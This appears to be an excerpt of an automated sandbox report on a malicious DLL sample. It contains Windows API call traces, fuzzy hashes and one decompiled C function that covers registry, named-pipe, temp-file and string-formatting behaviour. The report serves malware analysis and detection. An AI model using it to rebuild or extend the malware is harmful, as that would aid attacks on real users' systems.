                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA79
                • FreeLibrary.KERNEL32(00000000,?,?,?,?,046CB20B,?,?), ref: 046CDAA2
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                • String ID:
                • API String ID: 3772355505-0
                • Opcode ID: 7f0137089b2848afcd8b993c648763b3a1595f1c8ca942c716e6b8b04109f791
                • Instruction ID: 609a7d96d084e0ad891026cb6882ccd956628f2445c1577518562eb06e3ad11c
                • Opcode Fuzzy Hash: 7f0137089b2848afcd8b993c648763b3a1595f1c8ca942c716e6b8b04109f791
                • Instruction Fuzzy Hash: 923127B1A1520BAFD710EF65DD88D667BECEF44344B04552AE848CB212FB39ED018FA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C62BD
                • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C62C8
                • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C62D0
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046C62E5
                • lstrcpyW.KERNEL32(00000000,?), ref: 046C62F6
                • lstrcatW.KERNEL32(00000000,?), ref: 046C6308
                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C630D
                • lstrcatW.KERNEL32(00000000,046E83F0), ref: 046C6319
                • lstrcatW.KERNEL32(00000000), ref: 046C6321
                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C6326
                • lstrcatW.KERNEL32(00000000,046E83F0), ref: 046C6332
                • lstrcatW.KERNEL32(00000000,00000002), ref: 046C634D
                • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C6355
                • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,046DC710,?,?,?), ref: 046C6363
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                • String ID:
                • API String ID: 3635185113-0
                • Opcode ID: cb41e84600360d799e0b124e0c979ae7dc16f6c5e65a5ccca566e5ab6a9e3af3
                • Instruction ID: 93b8fd522ab0d413a8c8d171fa4eb78a46c5c57fce3ee5ea6669cddd712764f4
                • Opcode Fuzzy Hash: cb41e84600360d799e0b124e0c979ae7dc16f6c5e65a5ccca566e5ab6a9e3af3
                • Instruction Fuzzy Hash: 1221CD32100205ABD321BF56DC88E7B7BE8EF95B54F00141DF50597150EB69AC0A8BB5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046DB89D: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 046DB8E2
                  • Part of subcall function 046DB89D: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 046DB8FA
                  • Part of subcall function 046DB89D: WaitForSingleObject.KERNEL32(00000000,?,?,?,046C140C,?), ref: 046DB9C2
                  • Part of subcall function 046DB89D: HeapFree.KERNEL32(00000000,?,?,?,?,046C140C,?), ref: 046DB9EB
                  • Part of subcall function 046DB89D: HeapFree.KERNEL32(00000000,?,?,?,?,046C140C,?), ref: 046DB9FB
                  • Part of subcall function 046DB89D: RegCloseKey.ADVAPI32(?,?,?,?,046C140C,?), ref: 046DBA04
                • lstrcmp.KERNEL32(?,00000000), ref: 046D1607
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,046C133F,00000000,00000000), ref: 046D1633
                • GetCurrentThreadId.KERNEL32 ref: 046D16E4
                • GetCurrentThread.KERNEL32 ref: 046D16F5
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,046DA46B,046C133F,00000001,74E5F730,00000000,00000000), ref: 046D1732
                • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,046DA46B,046C133F,00000001,74E5F730,00000000,00000000), ref: 046D1746
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046D1754
                • wsprintfA.USER32 ref: 046D176C
                  • Part of subcall function 046C3FF7: lstrlen.KERNEL32(046C158F,00000000,046E6C5B,00000000,046E4160,046C158F,?,?,046DCD80,?,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046C4001
                  • Part of subcall function 046C3FF7: lstrcpy.KERNEL32(00000000,046C158F), ref: 046C4025
                  • Part of subcall function 046C3FF7: StrRChrA.SHLWAPI(046C158F,00000000,0000002E,?,00000003,?,?,046DCD80,?,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F), ref: 046C402C
                  • Part of subcall function 046C3FF7: lstrcat.KERNEL32(00000000,?), ref: 046C4083
                • lstrlen.KERNEL32(00000000,00000000), ref: 046D1777
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 046D178E
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D179F
                • HeapFree.KERNEL32(00000000,?), ref: 046D17AB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                • String ID:
                • API String ID: 773763258-0
                • Opcode ID: 5638d19234823d52355b3f7eb5d80cb2c8d416354806d5717f53b567ead824e5
                • Instruction ID: 03367e4372cb0aabb5e298cc69279b843cafb405a28fda841bdceb37b6de3afe
                • Opcode Fuzzy Hash: 5638d19234823d52355b3f7eb5d80cb2c8d416354806d5717f53b567ead824e5
                • Instruction Fuzzy Hash: F871F175E00219EFDB11DFA6DC849EEBBF9FB09304F044069E504AB220E775AD51DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 046D5BFF
                • memcpy.NTDLL(?,?,00000010), ref: 046D5C22
                • memset.NTDLL ref: 046D5C6E
                • lstrcpyn.KERNEL32(?,?,00000034), ref: 046D5C82
                • GetLastError.KERNEL32 ref: 046D5CB0
                • GetLastError.KERNEL32 ref: 046D5CF7
                • GetLastError.KERNEL32 ref: 046D5D16
                • WaitForSingleObject.KERNEL32(?,000927C0), ref: 046D5D50
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 046D5D5E
                • GetLastError.KERNEL32 ref: 046D5DD8
                • ReleaseMutex.KERNEL32(?), ref: 046D5DEA
                • RtlExitUserThread.NTDLL(?), ref: 046D5E00
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                • String ID:
                • API String ID: 4037736292-0
                • Opcode ID: 8c9536e34212ccee6df06126185b71f71f63df260496cd30092f295b7d509b87
                • Instruction ID: 29d4801285bc86af742044fffa10b3ab25ff395487092dbeb22671cd30084db6
                • Opcode Fuzzy Hash: 8c9536e34212ccee6df06126185b71f71f63df260496cd30092f295b7d509b87
                • Instruction Fuzzy Hash: 4C614971904301AFD720AF268808A2BB7E9FF98711F008A1EF597D7680F774E905CB66
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 046D565A
                • WaitForSingleObject.KERNEL32(0000043C,00000000), ref: 046D567C
                • ConnectNamedPipe.KERNEL32(?,?), ref: 046D569C
                • GetLastError.KERNEL32 ref: 046D56A6
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 046D56CA
                • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 046D570D
                • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 046D5716
                • WaitForSingleObject.KERNEL32(00000000), ref: 046D571F
                • CloseHandle.KERNEL32(?), ref: 046D5734
                • GetLastError.KERNEL32 ref: 046D5741
                • CloseHandle.KERNEL32(?), ref: 046D574E
                • RtlExitUserThread.NTDLL(000000FF), ref: 046D5764
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                • String ID:
                • API String ID: 4053378866-0
                • Opcode ID: 5ff886aadd0c43736f066929733861991eec236a3b4112491264c6e383ec4296
                • Instruction ID: 74d93d6bc9894126e53a2057510a56279ef35d310859f9d46ae4683384e30861
                • Opcode Fuzzy Hash: 5ff886aadd0c43736f066929733861991eec236a3b4112491264c6e383ec4296
                • Instruction Fuzzy Hash: 1551E330A54280FFD7129F34C8445BA7BA6FB56324B28195DF0D3CB6A1F734AD028B59
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000000,74E05520,?,00000000,?,?,046CD1E1), ref: 046D8883
                • lstrlen.KERNEL32(?), ref: 046D888B
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046D889B
                • lstrcpy.KERNEL32(00000000,?), ref: 046D88BA
                • lstrlen.KERNEL32(?), ref: 046D88CF
                • lstrlen.KERNEL32(?), ref: 046D88DD
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 046D892B
                • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 046D894F
                • lstrlen.KERNEL32(?), ref: 046D8982
                • HeapFree.KERNEL32(00000000,?,?), ref: 046D89AD
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 046D89C4
                • HeapFree.KERNEL32(00000000,?,?), ref: 046D89D1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                • String ID:
                • API String ID: 904523553-0
                • Opcode ID: 202826d3266f62a23902d2fb605c5f39e1db66090e2593df344d36937747bf90
                • Instruction ID: 98983e45bf6cc8d741eefbd335f4830f6ed691baa27b7f4a3d0de4604cc35938
                • Opcode Fuzzy Hash: 202826d3266f62a23902d2fb605c5f39e1db66090e2593df344d36937747bf90
                • Instruction Fuzzy Hash: 18417A71D0020ABFDF12AFA5CC48AAE7BB5FB84354F104025E9659B250E731E951DF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlImageNtHeader.NTDLL(00000000), ref: 046C9A1F
                • GetCurrentThreadId.KERNEL32 ref: 046C9A35
                • GetCurrentThread.KERNEL32 ref: 046C9A46
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                  • Part of subcall function 046D0D54: GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                  • Part of subcall function 046D0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                  • Part of subcall function 046D0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                  • Part of subcall function 046D0D54: lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                  • Part of subcall function 046D2295: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,74E05520,00000000,?,046C9A90,00000020,00000000,?,00000000), ref: 046D2300
                  • Part of subcall function 046D2295: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,74E05520,00000000,?,046C9A90,00000020,00000000,?,00000000), ref: 046D2328
                • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 046C9AC0
                • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 046C9ACC
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046C9B1B
                • wsprintfA.USER32 ref: 046C9B33
                • lstrlen.KERNEL32(00000000,00000000), ref: 046C9B3E
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 046C9B55
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                • String ID: W
                • API String ID: 630447368-655174618
                • Opcode ID: ca2161513521e98c0a32ce0f95028e42dabce7a2fca3bbedd6a8e7f41c2488a0
                • Instruction ID: 62af9e6ea80d9b075c8965882d01b500ae537641cd92f05fab1dfd83940a0ec4
                • Opcode Fuzzy Hash: ca2161513521e98c0a32ce0f95028e42dabce7a2fca3bbedd6a8e7f41c2488a0
                • Instruction Fuzzy Hash: DD415EB1A01119FFDB11EFA2DD48DAE7BB9FF48344B104029F8059A210F735AA64DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046C46F4
                  • Part of subcall function 046C4B8D: RegCloseKey.ADVAPI32(?,?,?,046E5181,00000000,00000000,00000000), ref: 046C4C14
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046C472F
                • lstrcpyW.KERNEL32(-00000002,?), ref: 046C4790
                • lstrcatW.KERNEL32(00000000,?), ref: 046C47A5
                • lstrcpyW.KERNEL32(?), ref: 046C47BF
                • lstrcatW.KERNEL32(00000000,?), ref: 046C47CE
                  • Part of subcall function 046C8D95: lstrlenW.KERNEL32(?,?,?,046D71F4,?,?,?,?,00001000,?,?,00001000), ref: 046C8DA8
                  • Part of subcall function 046C8D95: lstrlen.KERNEL32(?,?,046D71F4,?,?,?,?,00001000,?,?,00001000), ref: 046C8DB3
                  • Part of subcall function 046C8D95: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 046C8DC8
                • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 046C4838
                  • Part of subcall function 046E2531: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,046E523E,?), ref: 046E253D
                  • Part of subcall function 046E2531: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,046E523E,?), ref: 046E2565
                  • Part of subcall function 046E2531: memset.NTDLL ref: 046E2577
                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?), ref: 046C486D
                • GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?), ref: 046C4878
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C488E
                • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?), ref: 046C48A0
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                • String ID:
                • API String ID: 1430934453-0
                • Opcode ID: 3d13ac23268c3c0c3beedaf6f5b30cce6cd497b06f84900c77d8e58be315775c
                • Instruction ID: 5b39793ec8bc9adc10fed669f8520779821b1f366b38f8630f03976f6f00f969
                • Opcode Fuzzy Hash: 3d13ac23268c3c0c3beedaf6f5b30cce6cd497b06f84900c77d8e58be315775c
                • Instruction Fuzzy Hash: F451297190120AEFDB11EFA1DD54EAE77FDEF44244B14106AE901AB250FB35EE019B61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 55%
                			E01C13964(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				char _v20;
                				WCHAR* _v24;
                				signed int _v28;
                				intOrPtr _v32;
                				void* __edi;
                				void* __esi;
                				WCHAR* _t58;
                				signed int _t60;
                				signed int _t62;
                				intOrPtr _t64;
                				intOrPtr _t66;
                				intOrPtr _t70;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                				WCHAR* _t80;
                				WCHAR* _t83;
                				void* _t84;
                				void* _t85;
                				void* _t86;
                				intOrPtr _t92;
                				signed int _t103;
                				void* _t104;
                				intOrPtr _t105;
                				void* _t107;
                				intOrPtr* _t115;
                				void* _t119;
                				WCHAR* _t125;
                
                				_t58 =  *0x1c1a39c; // 0x2179818
                				_v24 = _t58;
                				_v28 = 8;
                				_v20 = GetTickCount();
                				_t60 = E01C153B5();
                				_t103 = 5;
                				_t98 = _t60 % _t103 + 6;
                				_t62 = E01C153B5();
                				_t117 = _t62 % _t103 + 6;
                				_v32 = _t62 % _t103 + 6;
                				_t64 = E01C14A66(_t60 % _t103 + 6);
                				_v16 = _t64;
                				if(_t64 != 0) {
                					_t66 = E01C14A66(_t117);
                					_v12 = _t66;
                					if(_t66 != 0) {
                						_push(5);
                						_t104 = 0xa;
                						_t119 = E01C16E0E(_t104,  &_v20);
                						if(_t119 == 0) {
                							_t119 = 0x1c191ac;
                						}
                						_t70 = E01C13692(_v24);
                						_v8 = _t70;
                						if(_t70 != 0) {
                							_t115 = __imp__;
                							_t72 =  *_t115(_t119);
                							_t75 =  *_t115(_v8);
                							_t76 =  *_t115(_a4);
                							_t80 = E01C12114(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                							_v24 = _t80;
                							if(_t80 != 0) {
                								_t105 =  *0x1c1a2d8; // 0x55d5a8
                								_t28 = _t105 + 0x1c1bb10; // 0x530025
                								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                								_push(4);
                								_t107 = 5;
                								_t83 = E01C16E0E(_t107,  &_v20);
                								_a8 = _t83;
                								if(_t83 == 0) {
                									_a8 = 0x1c191b0;
                								}
                								_t84 =  *_t115(_a8);
                								_t85 =  *_t115(_v8);
                								_t86 =  *_t115(_a4);
                								_t125 = E01C12114(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                								if(_t125 == 0) {
                									E01C12C11(_v24);
                								} else {
                									_t92 =  *0x1c1a2d8; // 0x55d5a8
                									_t44 = _t92 + 0x1c1bc88; // 0x73006d
                									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                									 *_a16 = _v24;
                									_v28 = _v28 & 0x00000000;
                									 *_a20 = _t125;
                								}
                							}
                							E01C12C11(_v8);
                						}
                						E01C12C11(_v12);
                					}
                					E01C12C11(_v16);
                				}
                				return _v28;
                			}

                APIs
                • GetTickCount.KERNEL32 ref: 01C1397C
                • lstrlen.KERNEL32(00000000,00000005), ref: 01C139FD
                • lstrlen.KERNEL32(?), ref: 01C13A0E
                • lstrlen.KERNEL32(00000000), ref: 01C13A15
                • lstrlenW.KERNEL32(80000002), ref: 01C13A1C
                • wsprintfW.USER32 ref: 01C13A62
                • lstrlen.KERNEL32(?,00000004), ref: 01C13A85
                • lstrlen.KERNEL32(?), ref: 01C13A8E
                • lstrlen.KERNEL32(?), ref: 01C13A95
                • lstrlenW.KERNEL32(?), ref: 01C13A9C
                • wsprintfW.USER32 ref: 01C13AD3
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$wsprintf$CountFreeHeapTick
                • String ID:
                • API String ID: 822878831-0
                • Opcode ID: e31cc26d660b50d6f62031667ad255b233bb171d69b8d98e4c7aa16f3ef92bd8
                • Instruction ID: 065519e43afcbcb46c88dd6ab73cb058200ef30d6518d247ac5b0cd1b5108db6
                • Opcode Fuzzy Hash: e31cc26d660b50d6f62031667ad255b233bb171d69b8d98e4c7aa16f3ef92bd8
                • Instruction Fuzzy Hash: DB519D32D80119EBCF11AFA4CC45ADE7BB1FF46314F154064EA08A7254DB75CA11EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 046E4513
                • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 046E4528
                • RegCreateKeyA.ADVAPI32(80000001,?), ref: 046E4550
                • HeapFree.KERNEL32(00000000,00000001), ref: 046E4591
                • HeapFree.KERNEL32(00000000,?), ref: 046E45A1
                • RtlAllocateHeap.NTDLL(00000000,046C5114), ref: 046E45B4
                • RtlAllocateHeap.NTDLL(00000000,046C5114), ref: 046E45C3
                • HeapFree.KERNEL32(00000000,?,?,046C5114,?,00000001,?,?), ref: 046E460D
                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,046C5114,?,00000001), ref: 046E4631
                • HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,046C5114,?,00000001), ref: 046E4656
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,046C5114,?,00000001), ref: 046E466B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$Allocate$CloseCreate
                • String ID:
                • API String ID: 4126010716-0
                • Opcode ID: 32e2becbdd1eeb6af2441001bad085c5ccc9e9961990e2ba8e1a07d64de83687
                • Instruction ID: 8ec8fe768f8228f095f4390ede2815c82620da302d76f805982b3a4dd50cacbd
                • Opcode Fuzzy Hash: 32e2becbdd1eeb6af2441001bad085c5ccc9e9961990e2ba8e1a07d64de83687
                • Instruction Fuzzy Hash: A751BEB5D01209EFDF01DFA6D8848EEBBB9FB08344B10506AE504A6210EB366E95DF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlImageNtHeader.NTDLL(?), ref: 046DD84B
                • GetTempPathA.KERNEL32(00000000,00000000,?,?,046DA83B,00000094,00000000,00000000,?), ref: 046DD863
                • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 046DD872
                • GetTempPathA.KERNEL32(00000001,00000000,?,?,046DA83B,00000094,00000000,00000000,?), ref: 046DD885
                • GetTickCount.KERNEL32 ref: 046DD889
                • wsprintfA.USER32 ref: 046DD8A0
                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 046DD8DB
                • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 046DD8F8
                • lstrlen.KERNEL32(00000000), ref: 046DD902
                • RegCloseKey.ADVAPI32(?), ref: 046DD91E
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 046DD92C
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                • String ID:
                • API String ID: 1404517112-0
                • Opcode ID: 10dff07e2f4409ae6ec0751f721d2cd016536533fd26fbf624afc9ec4e26aafd
                • Instruction ID: 06c778ef26aa151936aa2a9477a40d9785e4f4c9d6bc63c8902c4fca523c45c8
                • Opcode Fuzzy Hash: 10dff07e2f4409ae6ec0751f721d2cd016536533fd26fbf624afc9ec4e26aafd
                • Instruction Fuzzy Hash: AF31497190110AFFDB11AFA6DC88DAB7BECEB45354B005025F909DB200F73A9E459BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 046CFED4
                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,046DA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,046C78A1,00000000,00000094), ref: 046CFEE6
                • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,046DA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,046C78A1,00000000,00000094), ref: 046CFEF3
                • wsprintfA.USER32 ref: 046CFF0E
                • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,046C78A1,00000000,00000094,00000000), ref: 046CFF24
                • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 046CFF3D
                • WriteFile.KERNEL32(00000000,00000000), ref: 046CFF45
                • GetLastError.KERNEL32 ref: 046CFF53
                • CloseHandle.KERNEL32(00000000), ref: 046CFF5C
                • GetLastError.KERNEL32(?,00000000,?,046DA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,046C78A1,00000000,00000094,00000000), ref: 046CFF6D
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,046DA9D7,00000094,00000000,00000001,00000094,00000000,00000000,?,046C78A1,00000000,00000094), ref: 046CFF7D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                • String ID:
                • API String ID: 3873609385-0
                • Opcode ID: 40033a7187431470bbbb8debb7df957731a6020b03af97e7c51dc97dda906bf1
                • Instruction ID: 9a9f8bc57d5b01574ef6ac92ab6097bf1ef750d693e8e875fdb0581f81c95fa9
                • Opcode Fuzzy Hash: 40033a7187431470bbbb8debb7df957731a6020b03af97e7c51dc97dda906bf1
                • Instruction Fuzzy Hash: 04112171140208BFE3217B22EC8CF7B3BDDEB42359F041029F906DB280FA685D4186B0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrChrA.SHLWAPI(00000000,0000002C,7673D3B0,00000000,74E05520,74E5F710), ref: 046D1478
                • StrChrA.SHLWAPI(00000001,0000002C), ref: 046D148B
                • StrTrimA.SHLWAPI(00000000,?), ref: 046D14AE
                • StrTrimA.SHLWAPI(00000001,?), ref: 046D14BD
                • lstrlen.KERNEL32(00000000), ref: 046D14F2
                • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 046D1505
                • lstrcpy.KERNEL32(00000004,00000000), ref: 046D1523
                • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 046D1547
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                • String ID: W
                • API String ID: 1974185407-655174618
                • Opcode ID: dea7830ca894d75593e1e0413af9030d74f4f63bfc49141f0b564372731711a0
                • Instruction ID: b991c6ec2ae1ae0289246923bfccad14e6bbbb2bb7b5d9bfdbec6ff782188f48
                • Opcode Fuzzy Hash: dea7830ca894d75593e1e0413af9030d74f4f63bfc49141f0b564372731711a0
                • Instruction Fuzzy Hash: D0317E75D10215FFDB109FA5C848AAA7BF8EF49740F14505AF8059B200F7B9EE41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
